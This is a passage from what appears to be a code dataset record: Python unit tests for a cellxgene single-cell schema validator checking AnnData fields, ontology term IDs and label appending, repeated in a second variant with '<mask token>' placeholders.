Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = 
Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. 
Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. 
This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. 
Allowed terms: ['count', 'normal'].\"\n ])\n\n\nclass TestObsm(unittest.TestCase):\n \"\"\"\n Fail cases for adata.obsm\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_obsm_values_ara_numpy(self):\n \"\"\"\n values in obsm MUST be a numpy.ndarray\n \"\"\"\n self.validator.adata.obsm['X_tsne'] = pd.DataFrame(self.validator.\n adata.obsm['X_umap'], index=self.validator.adata.obs_names)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings have to be of 'numpy.ndarray' type, 'adata.obsm['X_tsne']' is <class 'pandas.core.frame.DataFrame'>').\"\n ])\n\n def test_obsm_values_at_least_one_X(self):\n \"\"\"\n At least one key for the embedding MUST be prefixed with \"X_\"\n \"\"\"\n self.validator.adata.obsm['umap'] = self.validator.adata.obsm['X_umap']\n self.validator.adata.uns['default_embedding'] = 'umap'\n del self.validator.adata.obsm['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: At least one embedding in 'obsm' has to have a key with an 'X_' prefix.\"\n ])\n\n def test_obsm_shape(self):\n \"\"\"\n Curators MUST annotate one or more two-dimensional (m >= 2) embeddings\n \"\"\"\n self.validator.adata.obsm['X_umap'] = numpy.delete(self.validator.\n adata.obsm['X_umap'], 0, 1)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: All embeddings must have as many rows as cells, and at least two columns.'adata.obsm['X_umap']' has shape of '(2, 1)'.\"\n ])\n\n\nclass TestAddingLabels(unittest.TestCase):\n \"\"\"\n Tests the addition of labels from IDs based on schema specification. The test is done by comparing manually\n created dataframes (positive control) against the ones produced by the validator\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.adata_with_labels = examples.adata_with_labels\n validator = Validator()\n validator.adata = examples.adata.copy()\n validator.validate_adata()\n cls.label_writer = AnnDataLabelAppender(validator)\n cls.label_writer._add_labels()\n\n def test_var_added_labels(self):\n \"\"\"\n When a dataset is uploaded, cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding feature identifier and the inferred NCBITaxon term for the reference organism\n to the var dataframe. Curators MUST NOT annotate the following columns:\n\n - feature_name. If the feature_biotype is \"gene\" then this MUST be the human-readable ENSEMBL gene\n name assigned to the feature_id. If the feature_biotype is \"spike-in\" then this MUST be the\n ERCC Spike-In identifier appended with \" spike-in control\".\n - feature_reference. This MUST be the reference organism for a feature:\n Homo sapiens\t\"NCBITaxon:9606\"\n Mus musculus\t\"NCBITaxon:10090\"\n SARS-CoV-2\t\"NCBITaxon:2697049\"\n ERCC Spike-Ins\t\"NCBITaxon:32630\"\n \"\"\"\n for column in ['feature_name', 'feature_reference']:\n expected_column = self.adata_with_labels.var[column]\n obtained_column = self.label_writer.adata.var[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n\n def test_obs_added_labels(self):\n \"\"\"\n When a dataset is uploaded, the cellxgene Data Portal MUST automatically add the matching human-readable\n name for the corresponding ontology term to the obs dataframe.\n Curators MUST NOT annotate the following columns.\n\n - assay. categorical with str categories. 
This MUST be the human-readable name assigned to the value\n of assay_ontology_term_id. Any clarifying text enclosed in parentheses and appended to\n assay_ontology_term_id MUST be appended to assay.\n - cell_type. categorical with str categories. This MUST be the human-readable name assigned to the value\n of cell_type_ontology_term_id.\n - development_stage. categorical with str categories. This MUST be \"unknown\" if set in\n development_stage_ontology_term_id; otherwise, this MUST be the human-readable name assigned to\n the value of development_stage_ontology_term_id.\n - disease. categorical with str categories. This MUST be the human-readable name assigned to\n the value of disease_ontology_term_id.\n - ethnicity. categorical with str categories. This MUST be \"na\" or \"unknown\" if\n set in ethnicity_ontology_term_id; otherwise, this MUST be the human-readable\n name assigned to the value of ethnicity_ontology_term_id.\n - organism. categorical with str categories. This MUST be the human-readable name assigned\n to the value of organism_ontology_term_id.\n - sex. categorical with str categories. This MUST be \"unknown\" if set in sex_ontology_term_id;\n otherwise, this MUST be the human-readable name assigned to the value of sex_ontology_term_id.\n - tissue. categorical with str categories. This MUST be the human-readable name assigned to the\n value of tissue_ontology_term_id. \" (cell culture)\" or \" (organoid)\" MUST\n be appended if present in tissue_ontology_term_id.\n \"\"\"\n for column in ['assay', 'cell_type', 'development_stage', 'disease',\n 'ethnicity', 'organism', 'sex', 'tissue']:\n expected_column = self.adata_with_labels.obs[column]\n obtained_column = self.label_writer.adata.obs[column]\n for i, j in zip(expected_column.tolist(), obtained_column.tolist()\n ):\n with self.subTest(i=i, j=j):\n self.assertEqual(i, j)\n",
"step-2": "<mask token>\n\n\nclass TestObs(unittest.TestCase):\n <mask token>\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def test_development_stage_ontology_term_id_human(self):\n \"\"\"\n development_stage_ontology_term_id categorical with str categories. If unavailable, this MUST be \"unknown\".\n If organism_ontolology_term_id is \"NCBITaxon:9606\" for Homo sapiens,\n this MUST be the most accurate HsapDv term.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:9606'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'HsapDv'. When 'organism_ontology_term_id' is 'NCBITaxon:9606' (Homo sapiens), 'development_stage_ontology_term_id' MUST be a term id of 'HsapDv' or unknown.\"\n ])\n\n def test_development_stage_ontology_term_id_mouse(self):\n \"\"\"\n If organism_ontolology_term_id is \"NCBITaxon:10090\" for Mus musculus,\n this MUST be the most accurate MmusDv term\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'NCBITaxon:10090'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'development_stage_ontology_term_id' is not a valid ontology term id of 'MmusDv'. When 'organism_ontology_term_id' is 'NCBITaxon:10090' (Mus musculus), 'development_stage_ontology_term_id' MUST be a term id of 'MmusDv' or unknown.\"\n ])\n <mask token>\n <mask token>\n <mask token>\n\n def test_organism_ontology_term_id(self):\n \"\"\"\n organism_ontology_term_id categorical with str categories. This MUST be a child of NCBITaxon:33208.\n \"\"\"\n self.validator.adata.obs['organism_ontology_term_id'][0\n ] = 'EFO:0000001'\n self.validator.adata.obs['development_stage_ontology_term_id'][0\n ] = 'unknown'\n self.validator.adata.obs['ethnicity_ontology_term_id'][0] = 'na'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'organism_ontology_term_id' is not a valid ontology term id of 'NCBITaxon'. Only children term ids of 'NCBITaxon:33208' for metazoan are allowed.\"\n ])\n <mask token>\n <mask token>\n <mask token>\n\n def test_sex_ontology_term_id(self):\n \"\"\"\n sex_ontology_term_id categorical with str categories.\n This MUST be a child of PATOPATO:0001894 for phenotypic sex or \"unknown\" if unavailable\n \"\"\"\n self.validator.adata.obs['sex_ontology_term_id'][0] = 'EFO:0000001'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'EFO:0000001' in 'sex_ontology_term_id' is not a valid ontology term id of 'PATO'. Only 'PATO:0000383', 'PATO:0000384', 'PATO:0001340', or 'unknown' are allowed.\"\n ])\n <mask token>\n\n\nclass TestVar(unittest.TestCase):\n \"\"\"\n Fail cases in adata.var and adata.raw.var\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_var_and_raw_var_same_index(self):\n \"\"\"\n var.index MUST contain unique identifiers for features. 
raw.var.index MUST be identical to var.index.\n \"\"\"\n var = Validator.getattr_anndata(self.validator.adata, 'var')\n new_index = list(var.index)\n tmp = new_index[0]\n new_index[0] = new_index[1]\n new_index[1] = tmp\n var.set_index(pd.Index(new_index), inplace=True)\n tmp = var.iloc[0, :].copy()\n var.iloc[0, :] = var.iloc[1, :].copy()\n var.iloc[1, :] = tmp\n self.validator.validate_adata()\n print('FOO', self.validator.errors)\n self.assertEqual(self.validator.errors, [\n \"ERROR: Index of 'raw.var' is not identical to index of 'var'.\"])\n\n def test_check_unique_var(self):\n \"\"\"\n var.index MUST contain unique ENSEMBL gene identifiers for features.\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[1] = new_index[0]\n component.set_index(pd.Index(new_index), inplace=True)\n component.iloc[1, :] = component.iloc[0, :]\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Column 'index' in dataframe '{component_name}' is not unique.\"\n ])\n\n def test_column_presence(self):\n \"\"\"\n var is a pandas.DataFrame. Curators MUST annotate the following columns in the obs dataframe.\n feature_is_filtered must not be in raw.var, and it's only checked in var\n \"\"\"\n columns = ['feature_is_filtered', 'feature_biotype']\n for component_name in ['var', 'raw.var']:\n for column in columns:\n if (column == 'feature_is_filtered' and component_name ==\n 'raw.var'):\n continue\n with self.subTest(component_name=component_name, column=column\n ):\n self.validator.errors = []\n self.validator.adata = examples.adata.copy()\n component = Validator.getattr_anndata(self.validator.\n adata, component_name)\n component.drop(column, axis=1, inplace=True)\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Dataframe '{component_name}' is missing column '{column}'.\"\n ])\n\n def test_feature_is_filtered(self):\n \"\"\"\n feature_is_filtered bool. This MUST be True if the feature was filtered out in the final matrix (X)\n but is present in the raw matrix (raw.X). The value for all cells of the given feature in the\n final matrix MUST be 0.\n\n Otherwise, this MUST be False.\n \"\"\"\n self.validator.adata.var['feature_is_filtered'][0] = True\n for i in range(self.validator.adata.X.shape[0]):\n self.validator.adata.X[i, 0] = 0\n self.validator.adata.X[0, 0] = 1\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Some features are 'True' in 'feature_is_filtered' of dataframe 'var', but there are 1 non-zero values in the corresponding columns of the matrix 'X'. 
All values for these features must be 0.\"\n ])\n\n def test_columns_not_in_raw_var(self):\n \"\"\"\n Curators MUST annotate the following column only in the var dataframe.\n This column MUST NOT be present in raw.var:\n feature_is_filtered\n \"\"\"\n self.validator.adata.raw = self.validator.adata\n self.validator.adata.uns['X_normalization'] = 'CPM'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Column 'feature_is_filtered' must not be present in 'raw.var'.\"\n ])\n\n def test_feature_id_wrong_format(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ID with an incorrect format \"ENSEBML_NOGENE\"\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSEBML_NOGENE'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: Could not infer organism from feature ID 'ENSEBML_NOGENE' in '{component_name}', make sure it is a valid ID.\"\n ])\n\n def test_feature_id_non_existent_ensembl(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ENSEMBL ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ENSG000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'gene'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ENSG000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n def test_feature_id_non_existent_ercc(self):\n \"\"\"\n feature_id (var.index) str.\n If the feature_biotype is \"gene\" then this MUST be an ENSEMBL term.\n If the feature_biotype is \"spike-in\" then this MUST be an ERCC Spike-In identifier.\n\n This tests the case of an ERCC ID that has the right format but doesn't exist\n \"\"\"\n for component_name in ['var', 'raw.var']:\n with self.subTest(component_name=component_name):\n self.validator.adata = examples.adata.copy()\n self.validator.errors = []\n component = Validator.getattr_anndata(self.validator.adata,\n component_name)\n new_index = list(component.index)\n new_index[0] = 'ERCC-000000'\n component.set_index(pd.Index(new_index), inplace=True)\n component['feature_biotype'][0] = 'spike-in'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n f\"ERROR: 'ERCC-000000' is not a valid feature ID in '{component_name}'.\"\n ])\n\n\nclass TestUns(unittest.TestCase):\n \"\"\"\n Fail cases in adata.uns\n \"\"\"\n\n def setUp(self):\n self.validator = Validator()\n self.validator.adata = examples.adata.copy()\n\n def test_required_fields_schema_version(self):\n \"\"\"\n 
Curators MUST annotate `schema_version` and values in uns (schema_version)\n \"\"\"\n del self.validator.adata.uns['schema_version']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: adata has no schema definition in 'adata.uns'. Validation cannot be performed.\"\n ])\n\n def test_required_fields_title(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (title)\n \"\"\"\n del self.validator.adata.uns['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'title' in 'uns' is not present.\"])\n\n def test_required_fields_X_normalization(self):\n \"\"\"\n Curators MUST annotate `schema_version` and values in uns (X_normalization)\n \"\"\"\n del self.validator.adata.uns['X_normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_normalization' in 'uns' is not present.\"])\n\n def test_leading_trailing_double_spaces_in_strings(self):\n \"\"\"\n The following sequences MUST NOT appear in str types documented in the schema:\n Leading control or space separators - ” This is an example”\n Trailing control or space separators - “This is an example ”\n Multiple (internal) control or space separators - \"This is an example\"\n \"\"\"\n self.validator.adata.uns['title'] = ' There is a leading space'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: ' There is a leading space' in 'uns['title']' is not valid, it contains leading spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There is a trailing space '\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There is a trailing space ' in 'uns['title']' is not valid, it contains trailing spaces.\"\n ])\n self.validator.adata.uns['title'] = 'There are double spaces'\n self.validator.errors = []\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'There are double spaces' in 'uns['title']' is not valid, it contains double spaces.\"\n ])\n\n def test_schema_version(self):\n \"\"\"\n Schema_version, This MUST be \"2.0.0\".\n \"\"\"\n self.validator.adata.uns['schema_version'] = '1.0.0'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Schema version '1.0.0' is not supported. Current supported versions: '['2.0.0']'. Validation cannot be performed.\"\n ])\n\n def test_title(self):\n \"\"\"\n Title MUST be a string\n \"\"\"\n self.validator.adata.uns['title'] = ['title']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['title']' in 'uns['title']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_is_str(self):\n \"\"\"\n X_normalization str.\n \"\"\"\n self.validator.adata.uns['X_normalization'] = ['normalization']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['normalization']' in 'uns['X_normalization']' is not valid, it must be a string.\"\n ])\n\n def test_X_normalization_not_raw(self):\n \"\"\"\n X_normalization str. 
This SHOULD describe the method used to normalize the data stored in AnnData X.\n If data in X are raw, this SHOULD be \"none\".\n\n FAIL CASE for when X_normalization was set to \"none\" but X may not be raw data\n \"\"\"\n del self.validator.adata.raw\n self.validator.adata.uns['X_normalization'] = 'none'\n self.validator.validate_adata()\n print('FOO', self.validator.warnings)\n self.assertEqual(self.validator.warnings, [\n \"WARNING: uns['X_normalization'] is 'none', there is no 'raw.X' and 'X' doesn't appear to have raw counts (integers)\"\n ])\n\n def test_batch_condition_is_list(self):\n \"\"\"\n batch_condition list[str]\n \"\"\"\n self.validator.adata.uns['batch_condition'] = numpy.array(self.\n validator.adata.uns['batch_condition'])\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['batch_condition'\n ] = 'cell_type_ontology_term_id'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'cell_type_ontology_term_id' in 'uns['batch_condition']' is not valid, it must be a list or numpy array.\"\n ])\n\n def test_batch_condition_is_column_from_obs(self):\n \"\"\"\n batch_condition list[str]. str values MUST refer to cell metadata keys in obs.\n \"\"\"\n self.validator.adata.uns['batch_condition'] = ['NO_COLUMN']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: Value 'NO_COLUMN' of list 'batch_condition' is not a column in 'adata.obs'.\"\n ])\n\n def test_default_embedding_is_str(self):\n \"\"\"\n Default_embedding str.\n \"\"\"\n self.validator.adata.uns['default_embedding'] = ['X_umap']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['X_umap']' in 'uns['default_embedding']' is not valid, it must be a string.\"\n ])\n\n def test_default_embedding_is_key_from_obsm(self):\n \"\"\"\n Default_embedding str. The value MUST match a key to an embedding in obsm\n \"\"\"\n self.validator.adata.uns['default_embedding'] = 'X_other'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'X_other' in 'uns['default_embedding']' is not valid, it must be a key of 'adata.obsm'.\"\n ])\n\n def test_X_approximate_distribution_is_str(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\".\n Note that `normal` is tested in the happy path test case using `good_uns`.\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'count'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [])\n self.validator.adata.uns['X_approximate_distribution'] = ['count']\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: '['count']' in 'uns['X_approximate_distribution']' is not valid, it must be a string.\"\n ])\n\n def test_X_approximate_distribution_is_valid(self):\n \"\"\"\n X_approximate_distribution str. The value MUST be \"count\" [...] or \"normal\"\n \"\"\"\n self.validator.adata.uns['X_approximate_distribution'] = 'COUNT'\n self.validator.validate_adata()\n self.assertEqual(self.validator.errors, [\n \"ERROR: 'COUNT' in 'uns['X_approximate_distribution']' is not valid. 
